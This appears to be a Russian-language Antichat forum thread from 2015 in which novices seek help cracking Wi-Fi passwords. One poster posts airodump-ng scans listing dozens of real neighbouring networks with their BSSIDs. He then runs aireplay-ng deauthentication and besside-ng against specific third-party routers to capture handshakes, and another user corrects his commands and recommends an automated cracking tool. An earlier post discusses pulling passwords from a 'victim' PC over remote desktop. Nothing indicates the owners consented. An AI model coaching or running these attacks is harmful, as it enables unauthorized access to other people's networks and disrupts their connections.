HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 11.05.2015, 10:10
Askei
New Member
Регистрация: 09.05.2015
Сообщений: 8
Провел на форуме:
2424

Репутация: 0
По умолчанию

Цитата:
Сообщение от binarymaster  

На память не воспроизведу, но каждую описанную задачу можно погуглить немного.

Через телнет уже не вариант, муторно. Через удалённый рабочий стол - можно утянуть пароли, используя софт для восстановления забытых паролей. Если есть полный доступ к жертве, то последний вариант самый удобный. Для одновременной работы с пользователем без его "выкидывания" можно воспользоваться RDP Wrapper'ом.

А что за софт для восстановления паролей? Пароль то при этом не поменяется?

Можешь подробней? А то я профан, не могу найти ничего..(

Пытался подключиться удаленно к своему 2ому компу в сетке...не даёт! В чем дело? Ввожу имя компьютера, но выдает ошибку(
 
Ответить с цитированием

  #62  
Старый 11.05.2015, 13:21
kentuha
New Member
Регистрация: 09.05.2015
Сообщений: 62
Провел на форуме:
12701

Репутация: 0
По умолчанию

Уже который день страдаю на хендшейками. Самая лакомая сетка и никак не хочет поддаваться.

Роутер настроен провайдером, у нас есть такие "Метросеть", роутер обозван Metro-144, канал не стандартный стоит: 6ch.

Так вот вопрос, может ли провайдер настроить так, чтобы не видны были подключенные к роутеру устройства?

Уже второй день скан стоит на хендшейки, сначала вручную, теперь пробую minidwep, все бесполезно, как будто не одного устройства так и не подключено.

Тут либо люди напрямую подключают комп к роутеру, либо что-то хитро настроено...

upd:

дождался я устройства, minidwep пытается снять хендейшк, но пока безрезультатно.

Есть идеи ребят?

 
Ответить с цитированием

  #63  
Старый 12.05.2015, 14:14
Василий-Шишкин
Познающий
Регистрация: 09.05.2015
Сообщений: 51
Провел на форуме:
9951

Репутация: 1
По умолчанию

Добрый день.

В первые пробую взломать пороль WiFi, установил ОС Kali Linux, работаю на ноутбуке от Lenovo G50-30.

Прочитал статью по ссылке (тоже на этом форуме), и много других.

Что я делал:

- подключил WiFi адаптер Alfa AWUS036H.

- переключил в режим мониторинга:

[CODE]
root@kali-Linux:~# airodump-ng mon0

CH 3 ][ Elapsed: 4 s ][ 2015-05-11 19:29

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

BC:F6:85:BF:C0:E6 -59 2 0 0 4 54e WPA CCMP PSK Kira-
10:BF:48:E6:55:18 -70 4 0 0 6 54e WPA2 CCMP PSK Roofl
B0:B2CC:C5:59 -63 3 0 0 8 54e WPA2 CCMP PSK Archi
D4:21:22:53:CE:65 -76 6 0 0 8 54e WPA2 CCMP PSK MGTS_
B0:B2CC:C5:58 -67 11 0 0 8 54e WPA2 CCMP PSK Archi
60:A4:4CE:45:48 -74 2 0 0 4 54e WPA2 CCMP PSK ASUS
C0:C1:C0:48:76:8F -74 2 0 0 2 54e. WPA2 CCMP PSK Alati
60:A4:4C:A2:B7:F8 -65 2 0 0 13 54e WPA2 CCMP PSK TAGNA
00:141:A5:4A:95 -67 2 0 0 11 54e. WPA2 CCMP PSK SPIDE
D8:50:E67:39:60 -67 12 3 0 6 54e WPA2 CCMP PSK Anako
00:22:15:71:2A:E5 -59 20 3 0 6 54 WPA TKIP PSK WL520
00:1C:F0:3B:C3:05 -66 18 4 1 6 54 . WPA TKIP PSK dlink
C4:6E:1F5:AE:8A -71 2 0 0 6 54e. WPA2 CCMP PSK TP-LI
90:E6:BA:F1:6C:30 -57 3 2 0 6 54 WPA2 CCMP PSK proje
00:25:9C:F7:36:85 -53 21 0 0 9 54e. WPA2 CCMP PSK Port
D4:21:22:99:45:61 -75 3 0 0 1 54e WPA2 CCMP PSK MGTS_
00:17:9A:84:FD:45 -71 3 0 0 3 54 . WPA2 CCMP PSK 2b4A9
C2:9FB:F7:43:B4 -69 0 3 0 1 -1 OPN
Lua: Error during loading:

[string "/usr/share/wireshark/init.lua"]:46: dofile has been disabled due to running Wireshark as superuser. See http://wiki.wireshark.org/CaptureSetup/CapturePrivileges for help in running Wireshark as an unprivileged user.


[/QUOTE]
Но всеже окрывает, и там ни чего нет, иногда есть но ни каких хендшейков, лишь информация о роутре и тому подобное.

через aircrack-ng, но все равно ни чего не вышло:

Код:
root@kali-Linux:~# aircrack-ng /wep.cap
Opening /wep.cap
read(file header) failed: Success
Read 0 packets.

No networks found, exiting.

Quitting aircrack-ng...
- снова перешел к airodump-ng, попробовал:

Код:
root@kali-Linux:~# airodump-ng --bssid CC:5D:4E:DA:11:C8 -c1 -w hachthis mon0

CH 1 ][ Elapsed: 59 mins ][ 2015-05-11 20:02 ][ fixed channel mon0: -1

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

CC:5D:4E:DA:11:C8 -60 0 5500 417 0 1 54e WPA2 CCMP PSK Sashko

BSSID STATION PWR Rate Lost Frames Probe
в этоже время пробовал откдючвть клиентов:

Код:
root@kali-Linux:~# aireplay-ng --deauth 5 -a CC:5D:4E:DA:11:C8 mon0
21:08:34 Waiting for beacon frame (BSSID: CC:5D:4E:DA:11:C8) on channel -1
21:08:34 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
root@kali-Linux:~# aireplay-ng --deauth 5 -a CC:5D:4E:DA:11:C8 -e Sashko mon0
21:08:41 Waiting for beacon frame (BSSID: CC:5D:4E:DA:11:C8) on channel -1
21:08:41 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
- снова ни чего не вышло, только других способов больше не знаю.

В чем ошибка ума не приложу, весь русские и английские форумы и статьи прочитал и облазил, полностю в ТУПИКЕ.

Заранее благодарен.[/QUOTE][/QUOTE]
 
Ответить с цитированием

  #64  
Старый 12.05.2015, 14:39
ak_45
Banned
Регистрация: 16.12.2011
Сообщений: 82
Провел на форуме:
20078

Репутация: 0
По умолчанию

Цитата:
Сообщение от Василий-Шишкин  

Но всеже окрывает, и там ни чего нет, иногда есть но ни каких хендшейков, лишь информация о роутре и тому подобное.

Opening /wep.cap

read(file header) failed: Success

Read 0 packets.

No networks found, exiting.

- а что ты там хотел увидеть? у тебя и нет точек с WEP шифрованием.

- для перехвата в besside-ng точек с WPA надо хелп читать внимательно:

To get WPA handshake from a specific target (channel and BSSID):

# besside-ng -W -c 6 -b 00:00:11:22:33:44 mon0
 
Ответить с цитированием

  #65  
Старый 12.05.2015, 14:47
Василий-Шишкин
Познающий
Регистрация: 09.05.2015
Сообщений: 51
Провел на форуме:
9951

Репутация: 1
По умолчанию

Цитата:
Сообщение от ak_45  

- а что ты там хотел увидеть? у тебя и нет точек с WEP шифрованием.

- для перехвата в besside-ng точек с WPA надо хелп читать внимательно:

To get WPA handshake from a specific target (channel and BSSID):

# besside-ng -W -c 6 -b 00:00:11:22:33:44 mon0

WEP - точки обязательно нужны? Автор же писал что это большая редкость, как я их найду тогда?
 
Ответить с цитированием

  #66  
Старый 12.05.2015, 14:52
Василий-Шишкин
Познающий
Регистрация: 09.05.2015
Сообщений: 51
Провел на форуме:
9951

Репутация: 1
По умолчанию

Слишком громко сказал, не найду. Шел около BMW центра:

Код:
CH  2 ][ Elapsed: 1 min ][ 2015-05-12 13:44  
  
BSSID  PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
  
02:B3:6E:F6:22:9E  -1  3  0  0  6  11  OPN  HP3420  
60:A4:4C:F0:1B:18  -58  71  36  0  6  54e. WPA2 CCMP  PSK  WEYLAND  
-----> 1C:BD:B9:3E:1D:24  -58  132  116  0  1  54 . WEP  WEP  BMTWlan_1  
10:FE:ED:36:F3:3E  -66  93  0  0  6  54e. WPA2 CCMP  PSK  Belka  
-----> 00:1F:1F:C5:F5:58  -68  121  0  0  11  54e  WEP  WEP  Digitus304  
00:22:55:57:51:00  -65  85  114  0  7  54e. OPN  bmstu_staff  
BC:F6:85:44:9B:CE  -65  135  0  0  5  54e  WPA  CCMP  PSK  homeAL  
EC:43:F6:08:E0:7C  -64  89  7  0  4  54e  WPA2 CCMP  PSK  sen_shamon  
C0:4A:00:DF:4A:E6  -66  103  0  0  9  54e. WPA2 CCMP  PSK  s13195  
B8:A3:86:14:13:F0  -66  126  0  0  2  54e  WPA  CCMP  PSK  instation  
10:FE:ED:80:95:10  -66  9  0  0  8  54e. WPA2 CCMP  PSK  TP-LINK  
1C:7E:E5:91:DB:4C  -66  16  5  0  6  54e  WPA  CCMP  PSK  DIR-620  
10:7B:EF:56:2B:BC  -68  106  2  0  3  54e  WEP  WEP  vpn9001  
00:18:E7:E8:51:9B  -69  25  0  0  9  54e. WPA2 CCMP  PSK  dlink  
00:1E:E5:A0:27:B0  -67  53  56  1  6  54  WPA2 CCMP  PSK  Inet1125  
00:1E:E5:A0:25:30  -69  88  72  0  11  54  WPA2 CCMP  PSK  Inet829  
E0:CB:4E:0B:11:6F  -68  57  3  0  6  54  WPA  TKIP  PSK  Zahar  
00:26:5A:18:D6:34  -68  48  0  0  12  54e. WPA2 TKIP  PSK  malahit_hall  
C0:4A:00:E4:E3:46  -68  22  1  0  4  54e  WPA2 CCMP  PSK  MNE NE JALKO  
40:4A:03:79:81:70  -68  33  0  0  10  54e  WPA2 CCMP  PSK  ZyXEL_KEENETIC_798170  
FC:F5:28:65:0C:96  -68  107  0  0  1  54  WPA2 CCMP  PSK  ROBOT  
00:22:B0:40:16:67  -69  94  2  0  3  54 . WPA2 TKIP  PSK  208  
E0:CB:4E:FC:7D:D5  -69  77  6  0  11  54  WPA  TKIP  PSK  wild  
0E:18:D6:47:E9:E0  -71  8  0  0  6  54e. WPA2 CCMP  PSK  Hololab_guest  
58:6D:8F:36:D7:5A  -69  8  3  0  6  54e  WPA2 CCMP  PSK  SkyNet  
00:27:22:E8:1E:62  -69  4  0  0  1  54e. WPA  TKIP  PSK  ubnt11951  
CC:5D:4E:FD:34:C8  -69  5  0  0  6  54e  WPA2 CCMP  PSK  TOLSTY  
00:03:7F:FE:00:00  -69  211  2  0  3  54  WPA2 CCMP  PSK  ibm506  
B8:A3:86:0B:BF:1A  -69  29  0  0  9  54e  WPA  CCMP  PSK  METRO  
12:18:D6:47:E9:E0  -70  10  0  0  6  54e. WPA2 CCMP  PSK    
6A:28:5D:67:19:E8  -69  28  0  0  1  54e  WPA2 CCMP  PSK  Keenetic-2528  
E8:94:F6:E5:89:9C  -70  15  0  0  10  54e. WPA2 CCMP  PSK  The_SpeeRT  
0A:18:D6:47:E9:E0  -70  6  0  0  6  54e. WPA2 CCMP  MGT  Hololab  
BC:F6:85:CA:33:D2  -71  53  0  0  11  54e  WPA2 CCMP  PSK  DIR-615  
34:08:04:13:0A:FE  -73  2  0  0  11  54e  WPA2 CCMP  PSK  Mixa83  
28:28:5D:96:CA:24  -71  107  0  0  3  54e  WPA2 CCMP  PSK  Keenetic-3064  
90:4E:2B:E4:5B:48  -71  32  0  0  3  54e  OPN  HUAWEI-GLR29J  
BC:EE:7B:65:EF:64  -71  31  0  0  10  54e  WPA  TKIP  PSK  VPN7505  
00:21:D8:93:DC:50  -71  7  0  0  8  54e. OPN  bmstu_staff  
10:FE:ED:82:24:1E  -72  17  0  0  11  54e. WPA2 CCMP  PSK  TP-LINK_82241E  
C4:A8:1D:5B:BB:47  -71  25  0  0  1  54e  WPA2 CCMP  PSK  Deonis2222  
00:3A:9A:A5:6E:91  -73  10  0  0  11  54e. OPN  bmstu_staff  
00:3A:9A:A5:6E:99  -70  13  0  0  11  54e. OPN  bmstu_guest  
1C:7E:E5:E3:FA:52  -73  28  0  0  13  54e  WPA2 TKIP  PSK  72111  
84:C9:B2:4C:DE:D5  -73  62  0  0  3  54e. WPA2 CCMP  PSK  s4929  
B0:B2:DC:3E:65:4C  -73  9  0  0  1  54e  WPA2 CCMP  PSK  Army  
28:28:5D:67:8D:34  -74  9  0  0  1  54e  WPA2 CCMP  PSK  dimon0764  
00:18:39:76:AA:CA  -73  2  0  0  11  54  WPA  TKIP  PSK  linksys  
00:1E:E5:A0:27:20  -73  0  2  0  6  -1  WPA    
90:94:E4:EF:32:38  -73  7  0  0  1  54e  WPA2 CCMP  PSK  Kostik  
40:4A:03:79:2F:95  -72  19  0  0  1  54e  WPA2 CCMP  PSK  s10932  
B0:B2:DC:5B:C7:C4  -73  16  1  0  1  54e  WPA2 CCMP  PSK  SovAsQ  
AC:22:0B:7C:B9:38  -76  12  0  0  13  54e  WPA2 CCMP  PSK  BURGUY  
00:14:D1:E2:D2:2A  -75  6  0  0  1  54 . WPA2 TKIP  PSK  Bardak  
EC:43:F6:E1:EE:BC  -75  3  0  0  3  54e  WPA2 CCMP  PSK  119  
40:4A:03:44:8A:BA  -75  8  0  0  3  54  WPA  TKIP  PSK  Pavel-PC  
00:3A:9A:A5:6E:90  -75  1  0  0  11  54e. OPN  bmstu_lb  
E8:DE:27:C2:EC:1E  -72  5  0  0  9  54e. WPA2 CCMP  PSK  O13311
сразу 2 штуки нашел.

Код:
root@kali-Linux:~# besside-ng -W -c 1 -b 1C:BD:B9:3E:1D:24 mon0
[13:57:01] Let's ride
[13:57:01] Resuming from besside.log
[13:57:01] Appending to wpa.cap
[13:57:01] Appending to wep.cap
[13:57:01] Logging to besside.log
[13:57:01] Can't attack BMTWlan_1
[13:57:01] All neighbors owned

Dying...
[13:57:01] TO-OWN [] OWNED []
Почему-то не хочет.
 
Ответить с цитированием

  #67  
Старый 12.05.2015, 15:22
ak_45
Banned
Регистрация: 16.12.2011
Сообщений: 82
Провел на форуме:
20078

Репутация: 0
По умолчанию

Цитата:
Сообщение от Василий-Шишкин  

Слишком громко сказал, не найду. Шел около BMW центра:

- ну тут есть, а в верхнем скрине не было.

- открывай besside.log и смотри что он тебе там наловил.

- флаг -W только для WPA.

- root@kali-Linux:~# besside-ng -W -c 1 -b 1C:BD:B9:3E:1D:24 mon0

зачем ты для WEP даёшь флаг -W ?

- для WPA запусти так просто может чё и словит:

root@kali-Linux:~# besside-ng -W mon0
 
Ответить с цитированием

  #68  
Старый 12.05.2015, 15:35
Василий-Шишкин
Познающий
Регистрация: 09.05.2015
Сообщений: 51
Провел на форуме:
9951

Репутация: 1
По умолчанию

Наконец-то найшел долгожданного клиента:

Код:
CH  6 ][ Elapsed: 5 mins ][ 2015-05-12 14:28 ][ fixed channel mon0: -1 
 
BSSID  PWR RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 
60:A4:4C:F0:1B:18  -59  0  928  392  0  6  54e. WPA2 CCMP  PSK  WEYLAND 
 
BSSID  STATION  PWR  Rate  Lost  Frames  Probe 
 
60:A4:4C:F0:1B:18  B4:52:7E:97:D3:F4  -65  0 - 1  0  9
Отключаю клиента от сети:

Код:
root@kali-Linux:~# aireplay-ng --deauth 5 -e WEYLAND -a 60:A4:4C:F0:1B:18 -c B4:52:7E:97:D3:F4 mon0
14:26:59  Waiting for beacon frame (BSSID: 60:A4:4C:F0:1B:18) on channel -1
14:26:59  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
root@kali-Linux:~# aireplay-ng --deauth 5 -e WEYLAND -a 60:A4:4C:F0:1B:18 -c B4:52:7E:97:D3:F4 wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start wlan0 '
Sysfs injection support was not found either.
но ни чего не смог

Цитата:
Сообщение от ak_45  

- ну тут есть, а в верхнем скрине не было.

- открывай besside.log и смотри что он тебе там наловил.

- флаг -W только для WPA.

- root@kali-Linux:~# besside-ng -W -c 1 -b 1C:BD:B9:3E:1D:24 mon0

зачем ты для WEP даёшь флаг -W ?

- для WPA запусти так просто может чё и словит:

root@kali-Linux:~# besside-ng -W mon0

-W что она делает?

Конкретный роутер пробую ломануть :

Код:
root@kali-Linux:~# besside-ng -W -c 6 -b 60:A4:4C:F0:1B:18 mon0
[14:24:16] Let's ride
[14:24:16] Resuming from besside.log
[14:24:16] Appending to wpa.cap
[14:24:16] Appending to wep.cap
[14:24:16] Logging to besside.log
[14:24:17] Got replayable packet for BMTWlan_1 [len 86]
[14:30:29] Got replayable packet for  [len 86]
[14:35:00] - Attacking [WEYLAND] WPA - DEAUTH (know 2 clients)
жду пока, может чо получится.
 
Ответить с цитированием

  #69  
Старый 12.05.2015, 15:49
ak_45
Banned
Регистрация: 16.12.2011
Сообщений: 82
Провел на форуме:
20078

Репутация: 0
По умолчанию

Цитата:
Сообщение от Василий-Шишкин  

жду пока, может чо получится.

- ерундой страдаешь, запускай minidwep-gtk, она автоматом всё делает и для WPA и WEP.
 
Ответить с цитированием

  #70  
Старый 12.05.2015, 16:00
Василий-Шишкин
Познающий
Регистрация: 09.05.2015
Сообщений: 51
Провел на форуме:
9951

Репутация: 1
По умолчанию

Цитата:
Сообщение от ak_45  

- ерундой страдаешь, запускай minidwep-gtk, она автоматом всё делает и для WPA и WEP.

Можете написать целый код или хотябы пример, я новичок в этом не могу так сходу все понимать.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.